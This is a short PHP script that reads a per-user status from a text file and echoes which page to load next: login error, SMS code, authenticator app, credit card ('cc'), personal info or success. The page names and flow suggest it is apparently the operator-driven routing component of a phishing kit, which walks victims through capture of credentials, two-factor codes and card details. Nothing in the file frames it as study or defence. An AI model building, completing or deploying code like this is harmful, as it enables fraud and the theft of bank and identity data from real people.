<?php
session_start();

function recuperer_valeur_utilisateur($id_utilisateur) {
    $lignes = file('fichier_utilisateurs.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    foreach ($lignes as $ligne) {
        list($id, $valeur) = explode(':', $ligne, 2);
        if ($id === $id_utilisateur) {
            return $valeur;
        }
    }
    return null; // ID utilisateur non trouvé
}

$rep = recuperer_valeur_utilisateur($_SESSION['user_id']);

//echo "success.php";

if($rep == 'errorLog')
{
   echo "loginError.php";
}
if($rep == 'smsCode')
{
    echo "sms.php";
}
if($rep == 'authApp')
{
    echo "authApp.php";
}
if($rep == 'cc')
{
    echo "cc.php";
}

if($rep == 'errorSms')
{
    echo "sms.php?error";
}

if($rep == 'errorCc')
{
    echo "cc.php?error";
}

if($rep == 'infos')
{
    echo "infos.php";
}

if($rep == 'success')
{
    echo "success.php";
}
?>
